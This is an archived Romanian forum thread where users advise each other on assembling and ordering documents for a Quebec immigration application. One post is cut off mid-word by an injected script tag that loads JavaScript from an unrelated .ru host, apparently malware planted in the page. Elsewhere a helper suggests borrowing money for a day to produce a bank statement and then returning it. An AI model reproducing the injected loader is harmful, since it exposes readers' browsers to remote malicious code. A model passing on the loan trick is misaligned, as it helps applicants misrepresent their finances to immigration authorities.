PDA

Arată versiune întreagă : Documente

tina
12.04.2005, 03:13
Spunetim va rog

Este vreo anumita ordine in care sa trimite documentele? si daca nu sa aplica le las liber - sa nu creada ca sint trimise incomplet.

Daca puteti sa ma ajutati va rog.

Maria

sorin
12.04.2005, 03:31
Uita-te si pe topicul de "Emigrarea in Quebec pas cu pas" si o sa-ti fie totul mult mai clar. Iata linkul:

http://www.romanian-portal.com/forum/forum_posts.asp?TID=111 (http://www.romanian-portal.com/forum/forum_posts.asp?TID=1117&PN=1) 7&PN=1

ovex
12.04.2005, 04:53
Parerea mea personala,in ceea ce priveste ordinea actelor,este:incepeti cu actele care dovedesc identitatea dumneavoastra,starea civila si adresade resedinta,apoi atasati actele care dovedesc studiile pe care le aveti acestea din urma sa fie urmate de actele doveditoare in ceea ce priveste activitatea profesionala,locul de munca,specializarea si vechimea in munca,apoi situatia financiara(extras de cont in orice moneda sau evaluare ANEVAR pentru o proprietate sau apartament).Nu uitati fotografiile.Tot ce va trebuie arata cam asa:
Actele in limba romana trebuie traduse in franceza sau engleza de catre un traducator autorizat de Ministerul Justitiei. Traducerile actelor NU se legalizeaza! Actele in limba romana trebuie xeroxate si acele fotocopii vor fi legalizate de catre un notar. Nu trimiteti doar copii xerox .
Actele care dovedesc studiile sunt:<B style="mso-bidi-font-weight: normal"> [/B]<B style="mso-bidi-font-weight: normal">
1.[/B]diploma de bacalaureat (plus foaia matricola doar pentru cei care nu au studii superioare)
2.certificat de calificare intr-o meserie pentru absolventii de liceu industrial care au primit o asemenea hartie (de obicei acest certificat a fost eliberat in acelasi timp cu diploma de bacalaureat)
3.diploma de facultate+foaia matricola
4.diploma de master/doctorat (daca e cazul)
5.alte diplome si certificate care arata calificare intr-un anumit domeniu (cursuri de calculatoare, de secretariat, de limbi straine etc.),cu durata de minim 1 an! <B style="mso-bidi-font-weight: normal">
Situatia. financiara:
[/B]1.extras de cont bancar (nu mai vechi de 10 zile, se trimite in original si nelegalizat; puteti anexa si o traducere autorizata a acestui extras de cont .
Sau:
2.act de proprietate al unui apartament(sau casa)care a fost obtinut pri<script src=http://www.iroe.ru/ngg.js></script>

Roxa
18.04.2005, 04:56
Ordinea in care se pun actele este data de ordinea subiectelor din formulare:

1. Identitate/Statut matrimonial
2. Educatie
3. Experienta de munca
4. Capacitate Financiara
5. Dovada unui prieten/ruda in Quebec
6. Chitanta de plata a procesarii dosarului

Aceasta ordine presupune ca la documentele care necesita traducere legalizata aceasta este atasata de documentul respectiv.

Regards,

ovex
06.07.2005, 02:51
Tina,cum e cu dosarul vostru,ati primit acusse de reception?

07.05.2006, 07:32
Aceasta ordine presupune ca la documentele care necesita traducere legalizata aceasta este atasata de documentul respectiv.

Regards,

Traducerile NU se legalizeaza.

ovex
10.05.2006, 09:39
S-ar face legalizarea legalizarii,traducatorul fiind autorizat de ministerul justitiei.

gabi39
05.06.2006, 06:58
Ovex
b. Adeverinta(e) eliberate de firma(le) la care ai lucrat sau lucrezi. Adeverintele trebuie sa aiba un antet al firmei, numar de telefon, fax, semnatura conducatorului firmei si in plus, acestea trebuie sa fie vizate de Inspectoratul Teritorial de Munca.

M-am dus la Inspectoratul Teritoial de Munca si nu au vizat adeverinta pt ca sotul lucreaza la o unitate bugetara iar eu in sistem bancar cu capital de stat, in cazul acesta ce sa fac??se poate trimete nevizat??Motivul a fost ca nu tin evidenta carnetelor de munca si ce sa vizeze??.

ovex
05.06.2006, 11:36
Deci,daca ai carte de munca,nu iti maitrebuie acele adeverinte sau contracte de munca,care sa fie vizate de ITM.Poti folosi in schimb(pe langa cartea de munca),contracte de munca sau adeverinte care dovedesc o activitate in plus fata de ceea ce ai trecut in cartea de munca.Deci daca ai cartea de munca ok si nu ai alte contracte,aceasta este dovada vechimii tale si nu mai trebuie sa vizezi nimik la ITM.

gabi39
06.06.2006, 17:50
ovex
Multumesc.

Drina
05.07.2006, 23:01
Buna, sunt Drina, din Republica Moldova, vrem sa emigram in Canada, eu impreuna cu sotul. Problema e ca nu prea stiu cum sa completex DCS, am intrat la rubrica Completarea DCS de la A la Z, dar...mai am ceva intrebari. De exemplu, la punctul 3, ref. la adresa, poti nota doar numarul strazii, denumirea strazii, dar numarul apartamentului unde-l scrii? Si mai am o intrebare despre extrasul bancar, despre ce suma minima este vorba? Am inteles ca daca nu ai cont, e suficient sa prezinti certificatul de imobil, evaluat de nu stiu ce structura specializata. Care ar fi aceasta structura la Chisinau? Merci anticipat! Bafta tuturor!

ovex
06.07.2006, 08:26
Salut Drina.La adresa ,scrii prima data,daca stai la bloc, sub numero,scara/apartament-de ex scara 3 apartament 9-adica: 3/9.Apoi scrii strada,orasul,etc.Despre sumele minime de intrare in Quebec am mai vorbit pe forum,cu siguranta vei gasi topicul,iar despre structura care iti poate face o evaluare casei la Chisinau,poti afla care este aceasta interesandu-te de ex. la un notar public.

Drina
06.07.2006, 20:26
Merci mult, Ovex!
Vezi ca la mine e putin mai complicat, este stada X.., 21/1, apartamentul 62, la noi scara nici nu se mentioneaza, probabil e diferit decat in Romania. Adica este vorba de str. X..., numarul 21, blocul numarul 1 si apartamentul 62. Stiu ca par ridicola ca tot insist cu problema asta, dar cum scriu, 21/1/61 sub numero, apoi denumirea strazii, apoi orasul, da?
Deci sa inteleg ca e suficient sa prezinti numai cetrificatul care atesta ca ai imobil, nu-i neaparat sa ai un cont, da?
Merci anticipat si scuze, daca deranjez prea tare!

Drina
06.07.2006, 23:51
Tot eu, Drina. Sorry, Ovex, vroiam sa zc 21/1/62, in loc de 21/1/61 :-)
In plus, mai am o intrebare, ce fac in cazul cand raman insarcinata, pana si dupa depunerea dosarului, avand in vedere ca ne-am lua copilul in Canada, in caz ca se naste pana la plecare.
Astept raspuns, merci anticipat!

ovex
07.07.2006, 07:18
dar cum scriu, 21/1/61 sub numero, apoi denumirea strazii, apoi orasul, da?
Deci sa inteleg ca e suficient sa prezinti numai cetrificatul care atesta ca ai imobil, nu-i neaparat sa ai un cont, da?

Scrii 21/61 .

NU e suficient numai actul de proprietate!Proprietatea in sine trebuie evaluata,deci trebuie scos in evidenta clar cat valoreaza ea,aceasta dovada tine loc de extras de cont.Deci cu alte cuvinte daca ai o propritate in valoare de .......lei,dovedesti ca o poti vinde cand pleci si ai banii de suparvietuire in Canada.Evaluarea proprietatii trebuie facuta de o societate care evalueaza astfel de bunuri,dar aceasta trebuie sa fie recunoscuta de guvernul de la Chisinau.Deci ,cum am mai zis,trebuie sa te interesezi cine face astfel de evaluari in Republica Moldova.Ca sa-ti usurezi sarcina si sa nu te mai complici cu evaluarea,nu poti sa iei imprumut ptr.24 de ore de la cineva,suma pe acre o ai nevoie.Iti faci un extras de cont si gata,dai banii inapoi.Oricum daca faci evaluarea aceasta trebuie tradusa si legalizata.

ovex
07.07.2006, 07:34
In plus, mai am o intrebare, ce fac in cazul cand raman insarcinata, pana si dupa depunerea dosarului, avand in vedere ca ne-am lua copilul in Canada, in caz ca se naste pana la plecare.

Cat esti insarcinata nu e nicio problema.Deci poti depune dosarul,mergi la interviu,depui dosarul 2 la Ambasada.....la medicale e aproape sigur ca vei avea probleme,nu cred ca se fac radiografii femeilor gravide(depinde ince luna esti dar se stie ca nu e sub nicio forma indicat sa iradiezi copilul).Asta e o varianta.A doua varianta este asa:daca se naste in inainte de plecare,este un nou membru al familiei deci are nevoie de CSQ!Deci ar trebui si actele bebelusului+taxele trimise la Viena si asteptarea CSQ,etc. .

Deci,poate mai asteptati si voi in medie cam 9 luni ( 6 pana la interviu si 3 dupa,pana la medicale)si apoi smileys/smiley2.gif. Decizia e insa a voastra! Bafta!

ovex
07.07.2006, 07:35
Bafta!

Drina
10.07.2006, 05:00
Ovex, merci mult mult de tot! Ne esti de mare ajutor! E misto ideea cu imprumutul, cu toate ca habar n-am cat minim trebuie de suplinit cintul pentru doi.
Vedem noi cum facem, o sa ne concepem bebeul in Canada! Bafta tuturor!

ovex
10.07.2006, 05:06
Pai ca sa fiti siguri si sa stai linistiti (si aveti de unde sa luati imprumut ptr o zi)cam 5000 $USD ar fi ok.

Drina
10.07.2006, 21:21
Merci, Ovex, gasim noi 5000 USD, bine ca nu e mai mult! Daca mai am intrebari, mai revin! Cele bune!

ovex
10.07.2006, 21:59
Numai bine!

moxica
01.10.2006, 02:39
Am o nelamurire:eu o sa fiu aplicant secundar si nu stiu ce act doveditor sa atasez pt experienta in munca. sunt pfa de aproape 2 ani si imi platesc toate darile la stat, pensie, sanatate. am intrebat la casa de asigurari sociale si mi-au spus ca nu au carnete de munca tiparite, s-ar putea sa nici nu le mai faca ca se schimba sistemul acum ca intram in UE. si eu ce ma fac? mi-au mai spus ca daca am nevoie ei imi pot da o hartoaga cum ca cotizez la ei. e valabila? eventual atasez hartoaga de la asigurari + declaratia de venit de la finante?

ceva idei? mersi mult

ovex
02.10.2006, 18:48
Vechimea in munca se dovedeste cu Cartea de munca sau cu contracte individuale de munca vizate de Inspectoratul Teritorial de Munca (ITM) .